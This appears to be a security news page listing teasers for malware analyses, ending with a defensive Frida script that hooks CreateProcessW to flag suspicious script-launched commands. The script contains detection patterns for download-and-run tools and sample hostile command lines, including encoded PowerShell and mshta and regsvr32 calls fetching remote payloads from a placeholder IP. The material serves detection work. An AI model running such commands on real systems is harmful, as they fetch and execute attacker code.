Hackers Use Facebook Ads to Spread JSCEAL Malware via Fake Cryptocurrency Trading Apps
Cybersecurity researchers are calling attention to an ongoing campaign that distributes fake cryptocurrency trading apps to deploy a compiled V8 JavaScript (JSC) malware called JSCEAL that can capture data such as credentials and wallets. The activity leverages thousands of malicious advertisements...
Threat Analysis: SquidLoader - Still Swimming Under the Radar
Threat Analysis: SquidLoader - Still Swimming Under the Radar By Charles Crofford · July 15, 2025 Executive summary A new wave of SquidLoader malware samples is actively targeting financial services institutions in Hong Kong. This sophisticated malware exhibits significant evasion capabilities,...
Demystifying Myth Stealer: A Rust Based InfoStealer
Demystifying Myth Stealer: A Rust Based InfoStealer By Niranjan Hegde, Vasantha Lakshmanan Ambasankar and Adarsh S · June 5, 2025 Introduction During regular proactive threat hunting, the Trellix Advanced Research Center identified a fully undetected infostealer malware sample written in Rust. Up...
A Bag of RATs: VenomRAT vs. AsyncRAT
Introduction Remote access tools (RATs) have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. These are open-sourc...
Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware
Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. Remcos RAT "provides purchasers with a wide range of advanced features to remotely control computers belonging to the buyer," Fortinet FortiGuard Lab...
New Stealer Uses Invalid Cert To Compromise Systems
New Stealer Uses Invalid Cert To Compromise Systems By Mohinder Gill, Mallikarjun Wali and Sangram Mohapatro · November 07, 2024 A new Stealer has been making the rounds. Its name: Fickle. Fickle Stealer is a new Rust-based information stealer that spreads through various attack vectors, includin...
Hijack Loader Malware Employs Process Hollowing, UAC Bypass in Latest Version
A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. "These enhancements aim to increase the malware's stealthiness, thereby remaining undetected for longer periods of time," Zscaler ThreatLabz...
Raspberry Robin Malware Upgrades with Discord Spread and New Exploits
The operators of Raspberry Robin are now using two new one-day exploits to achieve local privilege escalation, even as the malware continues to be refined and improved to make it stealthier than before. This means that "Raspberry Robin has access to an exploit seller or its authors develop the...
Researchers Unveil GuLoader Malware's Latest Anti-Analysis Techniques
Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing...
Turla Updates Kazuar Backdoor with Advanced Anti-Analysis to Evade Detection
The Russia-linked hacking crew known as Turla has been observed using an updated version of a known second-stage backdoor referred to as Kazuar. The new findings come from Palo Alto Networks Unit 42, which is tracking the adversary under its constellation-themed moniker Pensive Ursa. "As the code...
Typhon Stealer back with new variant named Typhon Reborn
Summary Typhon Stealer, malware known for its ability to steal crypto wallets, log keystrokes, and evade antivirus programs, first gained wide attention in early August 2022. Soon after, the...
SharkBot Android banking Trojan cleans users out
Researchers have discovered and analyzed a new Android banking Trojan that allows attackers to steal sensitive banking information such as user credentials, personal information, current balance, and even to perform gestures on the infected device. According to the researchers, SharkBot...
Alert — There's A New Malware Out There Snatching Users' Passwords
A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed "Saint Bot," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active developmen...
APT Attack Injects Malware into Windows Error Reporting
A campaign that injects malware into the Windows Error Reporting (WER) service to evade detection is potentially the work of a Vietnamese APT group, researchers said. The attack, discovered on Sept. 17 by researchers at Malwarebytes Threat Intelligence Team, lures its victims with a phishing campai...
Egregor Ransomware Threatens 'Mass-Media' Release of Corporate Data
A freshly discovered family of ransomware called Egregor has been spotted in the wild, using a tactic of siphoning off corporate information and threatening a “mass-media” release of it before encrypting all files. Egregor is an occult term meant to signify the collective energy or force of a gro...
TAU Threat Discovery: Conti Ransomware
Conti is a new family of ransomware observed in the wild by the Carbon Black Threat Analysis Unit (TAU). Unlike most ransomware, Conti contains unique features that separate it in terms of performance and focus on network-based targets. Conti uses a large number of independent threads to perform...
Threat Analysis Unit (TAU) Threat Intelligence Notification: CrescentCore (macOS)
In June of 2019, researchers at Intego discovered a new Trojan for macOS systems which they named CrescentCore. Much like Shlayer and other common malware targeting macOS systems, CrescentCore is often delivered via a fake Adobe Flash Player installer or updater. This malware employs multiple...
Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change
The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change. While the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forum...
What we learned by unpacking a recent wave of Imminent RAT infections using AMP
This blog post was authored by Chris Marczewski Cisco Talos has been tracking a series of Imminent RAT infections for the past two months following reported data from the Cisco Advanced Malware Protection (AMP) Exploit Prevention engine. AMP successfully stopped the malware before it was able to infe...
Frida-Wshook - Script Analysis Tool Based On Frida.re
frida-wshook is an analysis and instrumentation tool that uses frida.re to hook common functions often used by malicious script files that are run using WScript/CScript. The tool intercepts Windows API functions and doesn't implement function stubs or proxies within the targeted scripting...
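The technique the frida-wshook summary describes, hooking a Windows API function from inside a wscript.exe/cscript.exe process rather than stubbing the scripting engine's own objects, looks roughly like the following. This is an added example written for this page, not frida-wshook's own code: the choice of kernel32!CreateProcessW as the hooked export, the indicator patterns, and the sample command lines are all illustrative assumptions. The classifier is kept free of Frida APIs so it can be exercised outside the instrumented process; the hook is installed only when the Frida `Interceptor` global is present.

```javascript
// Added example (not frida-wshook's own code): a Frida script that hooks
// kernel32!CreateProcessW inside a wscript.exe/cscript.exe process and flags
// child command lines that look like living-off-the-land tradecraft.
// Assumptions: the hooked export, the pattern list and the sample command
// lines below are illustrative choices, not taken from the tool or the page.

// Patterns a script-based downloader/launcher commonly produces (illustrative).
const SUSPICIOUS_PATTERNS = [
  { name: 'encoded-powershell', re: /powershell(?:\.exe)?[^\n]*\s-(?:e|ec|enc|encodedcommand)\s/i },
  { name: 'powershell-download', re: /powershell[^\n]*(?:downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient)/i },
  { name: 'mshta-remote', re: /mshta(?:\.exe)?\s+["']?(?:https?|vbscript|javascript):/i },
  { name: 'regsvr32-scrobj', re: /regsvr32[^\n]*\/i:[^\n]*\b(?:https?:|\.sct)/i },
  { name: 'certutil-download', re: /certutil[^\n]*-urlcache/i },
  { name: 'bitsadmin-transfer', re: /bitsadmin[^\n]*\/transfer/i },
  { name: 'rundll32-url', re: /rundll32[^\n]*(?:url\.dll|javascript:)/i },
];

// Pure classifier: given a command line captured at CreateProcessW, return
// the matching indicators. No Frida APIs here, so it runs under plain Node too.
function classifyCommandLine(cmdline) {
  const text = (cmdline || '').trim();
  const hits = SUSPICIOUS_PATTERNS.filter(p => p.re.test(text)).map(p => p.name);
  return { cmdline: text, suspicious: hits.length > 0, indicators: hits };
}

// Read an optional LPCWSTR argument; CreateProcessW allows NULL for lpApplicationName.
function readOptionalWide(ptr) {
  return (!ptr || ptr.isNull()) ? null : ptr.readUtf16String();
}

// Install the hook only when running under Frida (the Interceptor global exists only there).
// Returns true if the hook was installed, false when not running inside Frida.
function installCreateProcessHook(onEvent) {
  if (typeof Interceptor === 'undefined') return false;
  const target = Process.getModuleByName('kernel32.dll').getExportByName('CreateProcessW');
  Interceptor.attach(target, {
    onEnter(args) {
      // BOOL CreateProcessW(lpApplicationName, lpCommandLine, ...)
      const app = readOptionalWide(args[0]);
      const cmd = readOptionalWide(args[1]);
      this.event = Object.assign({ application: app }, classifyCommandLine(cmd || app));
    },
    onLeave(retval) {
      this.event.created = retval.toInt32() !== 0;
      onEvent(this.event);
    },
  });
  return true;
}

// Constructed sample command lines (not captured from a real infection).
const SAMPLE_COMMAND_LINES = [
  'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=',
  'mshta.exe http://203.0.113.10/update.hta',
  'regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll',
  '"C:\\Windows\\System32\\notepad.exe" C:\\Users\\Public\\readme.txt',
];

// Runs the classifier over the constructed samples; used when not under Frida.
function classifySamples() {
  return SAMPLE_COMMAND_LINES.map(classifyCommandLine);
}

if (!installCreateProcessHook(ev => console.log(JSON.stringify(ev)))) {
  classifySamples().forEach(r => console.log(JSON.stringify(r)));
}
```

Loaded with the frida CLI's `-l` option into a spawned wscript.exe, the script reports every child process the malicious script tries to start, together with which indicator fired; run under plain Node it only classifies the constructed samples. Hooking the process-creation API rather than the scripting engine's own COM objects is what lets this approach survive obfuscation of the script itself: however the script is encoded, the command line it eventually hands to CreateProcessW is visible in clear text at that boundary.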